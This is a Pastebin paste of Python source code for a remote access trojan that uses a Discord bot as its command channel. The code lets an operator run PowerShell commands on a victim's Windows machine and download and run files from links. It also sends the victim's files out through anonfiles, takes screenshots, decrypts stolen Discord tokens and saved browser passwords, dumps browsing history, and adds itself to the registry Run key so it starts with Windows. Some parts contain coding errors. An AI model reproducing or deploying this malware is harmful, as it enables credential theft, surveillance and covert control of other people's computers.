FlyFar

Python-Trojan | Source Code

Jun 28th, 2023
143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 12.39 KB | Cybersecurity | 0 0
  1. '''
  2. for more information, visits https://github.com/Jeff53978/Python-Trojan
  3. '''
  4. import os, discord, subprocess, requests, re, json, win32crypt, base64, shutil, sqlite3, winreg
  5. from Crypto.Cipher import AES
  6. from PIL import ImageGrab
  7. from datetime import datetime
  8.  
  9. APPDATA = os.getenv("APPDATA")
  10. LOCALAPPDATA = os.getenv("LOCALAPPDATA")
  11. TEMP = os.getenv("TEMP")
  12.  
  13. guild_id = ""
  14. token = ""
  15.  
  16. def get_processor():
  17.     stdout = subprocess.Popen(
  18.         ["powershell.exe", "Get-WmiObject -Class Win32_Processor -ComputerName. | Select-Object -Property Name"], stdout=subprocess.PIPE, shell=True
  19.     ).stdout.read().decode()
  20.     return stdout.split("\n")[3]
  21.  
  22. def get_gpu():
  23.     stdout = subprocess.Popen(
  24.         ["powershell.exe", "Get-WmiObject -Class Win32_VideoController -ComputerName. | Select-Object -Property Name"], stdout=subprocess.PIPE, shell=True
  25.     ).stdout.read().decode()
  26.     return stdout.split("\n")[3]
  27.  
  28. def get_os():
  29.     stdout = subprocess.Popen(
  30.         ["powershell.exe", "Get-WmiObject -Class Win32_OperatingSystem -ComputerName. | Select-Object -Property Caption"], stdout=subprocess.PIPE, shell=True
  31.     ).stdout.read().decode()
  32.     return stdout.split("\n")[3]
  33.  
  34. intents = discord.Intents.all()
  35. bot = discord.Client(intents=intents)
  36. session_id = os.urandom(8).hex()
  37. commands = "\n".join([
  38.     "help - Help command",
  39.     "ping - Ping command",
  40.     "cwd - Get current working directory",
  41.     "cd - Change directory",
  42.     "ls - List directory",
  43.     "download <file> - Download file",
  44.     "upload <link> - Upload file",
  45.     "shell - Execute shell command",
  46.     "run <file> - Run an file",
  47.     "exit - Exit the session",
  48.     "screenshot - Take a screenshot",
  49.     "tokens - Get all discord tokens",
  50.     "passwords - Extracts all browser passwords",
  51.     "history - Extracts all browser history",
  52.     "startup <name> - Add to startup",
  53. ])
  54.  
  55. @bot.event
  56. async def on_ready():
  57.     guild = bot.get_guild(int(guild_id))
  58.     channel = await guild.create_text_channel(session_id)
  59.     ip_address = requests.get("https://api.ipify.org").text
  60.     embed = discord.Embed(title="New session created", description="", color=0xfafafa)
  61.     embed.add_field(name="Session ID", value=f"```{session_id}```", inline=True)
  62.     embed.add_field(name="Username", value=f"```{os.getlogin()}```", inline=True)
  63.     embed.add_field(name="🛰️  Network Information", value=f"```IP: {ip_address}```", inline=False)
  64.     sys_info = "\n".join([
  65.         f"OS: {get_os()}",
  66.         f"CPU: {get_processor()}",
  67.         f"GPU: {get_gpu()}"
  68.     ])
  69.     embed.add_field(name="🖥️  System Information", value=f"```{sys_info}```", inline=False)
  70.     embed.add_field(name="🤖  Commands", value=f"```{commands}```", inline=False)
  71.     await channel.send(embed=embed)
  72.  
  73. @bot.event
  74. async def on_message(message):
  75.     if message.author == bot.user:
  76.         return
  77.  
  78.     if message.channel.name != session_id:
  79.         return
  80.  
  81.     if message.content == "help":
  82.         embed = discord.Embed(title="Help", description=f"```{commands}```", color=0xfafafa)
  83.         await message.reply(embed=embed)
  84.  
  85.     if message.content == "ping":
  86.         embed = discord.Embed(title="Ping", description=f"```{round(bot.latency * 1000)}ms```", color=0xfafafa)
  87.         await message.reply(embed=embed)
  88.  
  89.     if message.content.startswith("cd"):
  90.         directory = message.content[3:]
  91.         try:
  92.             os.chdir(directory)
  93.             embed = discord.Embed(title="Changed Directory", description=f"```{os.getcwd()}```", color=0xfafafa)
  94.         except:
  95.             embed = discord.Embed(title="Error", description=f"```Directory not found```", color=0xfafafa)
  96.         await message.reply(embed=embed)
  97.  
  98.     if message.content == "ls":
  99.         files = "\n".join(os.listdir())
  100.         if files == "":
  101.             files = "No files found"
  102.         if len(files) > 4093:
  103.             open(f"{TEMP}\\list.txt", "w").write(files)
  104.             embed = discord.Embed(title=f"Files > {os.getcwd()}", description="```See attachment```", color=0xfafafa)
  105.             file = discord.File(f"{TEMP}\\list.txt")
  106.             return await message.reply(embed=embed, file=file)
  107.         embed = discord.Embed(title=f"Files > {os.getcwd()}", description=f"```{files}```", color=0xfafafa)
  108.         await message.reply(embed=embed)
  109.  
  110.     if message.content.startswith("download"):
  111.         file = message.content[9:]
  112.         try:
  113.             link = requests.post("https://api.anonfiles.com/upload", files={"file": open(file, "rb")}).json()["data"]["file"]["url"]["full"]
  114.             embed = discord.Embed(title="Download", description=f"```{link}```", color=0xfafafa)
  115.             await message.reply(embed=embed)
  116.         except:
  117.             embed = discord.Embed(title="Error", description=f"```File not found```", color=0xfafafa)
  118.             await message.reply(embed=embed)
  119.  
  120.     if message.content.startswith("upload"):
  121.         link = message.content[7:]
  122.         file = requests.get(link).content
  123.         with open(os.path.basename(link), "wb") as f:
  124.             f.write(file)
  125.         embed = discord.Embed(title="Upload", description=f"```{os.path.basename(link)}```", color=0xfafafa)
  126.         await message.reply(embed=embed)
  127.  
  128.     if message.content.startswith("shell"):
  129.         command = message.content[6:]
  130.         output = subprocess.Popen(
  131.             ["powershell.exe", command], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True
  132.         ).communicate()[0].decode("utf-8")
  133.         if output == "":
  134.             output = "No output"
  135.         if output > 4093:
  136.             open(f"{TEMP}\\output.txt", "w").write(output)
  137.             embed = discord.Embed(title=f"Shell > {os.getcwd()}", description="```See attachment```", color=0xfafafa)
  138.             file = discord.File(f"{os.getenv('TEMP')}\\output.txt")
  139.             return await message.reply(embed=embed, file=file)
  140.         embed = discord.Embed(title=f"Shell > {os.getcwd()}", description=f"```{output}```", color=0xfafafa)
  141.         await message.reply(embed=embed)
  142.  
  143.     if message.content.startswith("run"):
  144.         file = message.content[4:]
  145.         subprocess.Popen(file, shell=True)
  146.         embed = discord.Embed(title="Started", description=f"```{file}```", color=0xfafafa)
  147.         await message.reply(embed=embed)
  148.  
  149.     if message.content == "exit":
  150.         await message.channel.delete()
  151.         await bot.close()
  152.  
  153.     if message.content == "screenshot":
  154.         screenshot = ImageGrab.grab(all_screens=True)
  155.         path = os.path.join(TEMP, "screenshot.png")
  156.         screenshot.save(path)
  157.         file = discord.File(path)
  158.         embed = discord.Embed(title="Screenshot", color=0xfafafa)
  159.         embed.set_image(url="attachment://screenshot.png")
  160.         await message.reply(embed=embed, file=file)
  161.            
  162.     if message.content == "cwd":
  163.         embed = discord.Embed(title="Current Directory", description=f"```{os.getcwd()}```", color=0xfafafa)
  164.         await message.reply(embed=embed)
  165.        
  166.     if message.content == "tokens":
  167.         tokens = []
  168.         path = f"{APPDATA}\\discord"
  169.         if not os.path.exists(path):
  170.             return ["Discord not installed"]
  171.         local_state = open(f"{path}\\Local State", "r")
  172.         encrypted_master_key = base64.b64decode(json.loads(local_state.read())["os_crypt"]["encrypted_key"])
  173.         master_key = win32crypt.CryptUnprotectData(encrypted_master_key[5:], None, None, None, 0)[1]
  174.         for file_name in os.listdir(f"{path}\\Local Storage\\leveldb"):
  175.             if file_name[-3:] not in ["log", "ldb"]:
  176.                 continue
  177.             for line in [x.strip() for x in open(f'{path}\\Local Storage\\leveldb\\{file_name}', errors='ignore').readlines() if x.strip()]:
  178.                 for y in re.findall(r"dQw4w9WgXcQ:[^\"]*", line):
  179.                     encrypted_token = base64.b64decode(y.split('dQw4w9WgXcQ:')[1])
  180.                     token = AES.new(master_key, AES.MODE_GCM, encrypted_token[3:15]).decrypt(encrypted_token[15:])[:-16].decode()
  181.                     token = token.replace(".", " ")
  182.                     tokens.append(token)
  183.         embed = discord.Embed(title="Tokens", description=f"```{tokens}```", color=0xfafafa)
  184.         await message.reply(embed=embed)
  185.                            
  186.     if message.content == "history":
  187.         paths = []
  188.         file = open(f"{TEMP}\\history.txt", "w")
  189.         for file, folder, files in os.walk(APPDATA):
  190.             if "History" in files:
  191.                 paths.append(file)
  192.         for file, folder, files in os.walk(LOCALAPPDATA):
  193.             if "History" in files:
  194.                 paths.append(file)
  195.         for path in paths:
  196.             if "History" not in os.listdir(path):
  197.                 return
  198.             r_id = os.urandom(16).hex()
  199.             shutil.copy (f"{path}\\History", f"{TEMP}\\{r_id}.db")
  200.             connection = sqlite3.connect(f"{TEMP}\\{r_id}.db")
  201.             cursor = connection.cursor()
  202.             cursor.execute("SELECT url, title, last_visit_time FROM urls")
  203.             for col in cursor.fetchall():
  204.                 url = col[0]
  205.                 title = col[1]
  206.                 last_visit_time = col[2]
  207.                 f.write(f"{url} - {title} - {datetime.fromtimestamp(last_visit_time/1000000-11644473600).strftime('%Y-%m-%d %H:%M:%S')}\n")
  208.             connection.close()
  209.         file.close()
  210.         embed = discord.Embed(title="History", description="```See attachment```", color=0xfafafa)
  211.         file = discord.File(f"{TEMP}\\history.txt")
  212.         await message.reply(embed=embed, file=file)
  213.        
  214.     if message.content == "passwords":
  215.         paths = []
  216.         file = open(f"{TEMP}\\passwords.txt", "w")
  217.         for file, folder, files in os.walk(APPDATA):
  218.             if "Login Data" in files:
  219.                 paths.append(file)
  220.                
  221.         for file, folder, files in os.walk(LOCALAPPDATA):
  222.             if "Login Data" in files:
  223.                 paths.append(file)
  224.         for path in paths:
  225.             if "Login Data" not in os.listdir(path):
  226.                 return
  227.             r_id = os.urandom(16).hex()
  228.             try:
  229.                 local_state = open(f"{path}\\Local State", "r")
  230.             except:
  231.                 try: local_state = open(f"{path}\\..\\Local State", "r")
  232.                 except: return
  233.             encrypted_master_key = base64.b64decode(json.loads(local_state.read())["os_crypt"]["encrypted_key"])
  234.             master_key = win32crypt.CryptUnprotectData(encrypted_master_key[5:], None, None, None, 0)[1]
  235.             shutil.copy (f"{path}\\Login Data", f"{TEMP}\\{r_id}.db")
  236.             connection = sqlite3.connect(f"{TEMP}\\{r_id}.db")
  237.             cursor = connection.cursor()
  238.             cursor.execute("SELECT action_url, username_value, password_value FROM logins")
  239.             for col in cursor.fetchall():
  240.                 url = col[0]
  241.                 username = col[1]
  242.                 try:
  243.                     password = AES.new(master_key, AES.MODE_GCM, col[2][3:15]).decrypt(col[2][15:])[:-16].decode()
  244.                 except:
  245.                     try:
  246.                         password = win32crypt.CryptUnprotectData(col[2], None, None, None, 0)[1].decode()
  247.                     except:
  248.                         password = "Decryption failed"
  249.                 if password == "":
  250.                     password = "Decryption failed"
  251.  
  252.                 file.write(f"{url} - {username} - {password}\n")
  253.             connection.close()
  254.         file.close()
  255.         embed = discord.Embed(title="Passwords", description="```See attachment```", color=0xfafafa)
  256.         file = discord.File(f"{TEMP}\\passwords.txt")
  257.         await message.reply(embed=embed, file=file)
  258.        
  259.     if message.startswith("startup"):
  260.         name = message.content[8:]
  261.         if not name:
  262.             embed = discord.Embed(title="Error", description="```No name provided```", color=0xfafafa)
  263.             await message.reply(embed=embed)
  264.         else:
  265.             winreg.CreateKey(winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run")
  266.             registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, winreg.KEY_WRITE)
  267.             winreg.SetValueEx(registry_key, name, 0, winreg.REG_SZ, os.path.realpath(__file__))
  268.             winreg.CloseKey(registry_key)
  269.             embed = discord.Embed(title="Startup", description=f"```Added to startup as {name}```", color=0xfafafa)
  270.             await message.reply(embed=embed)
  271.  
  272. bot.run(token)
Add Comment
Please, Sign In to add comment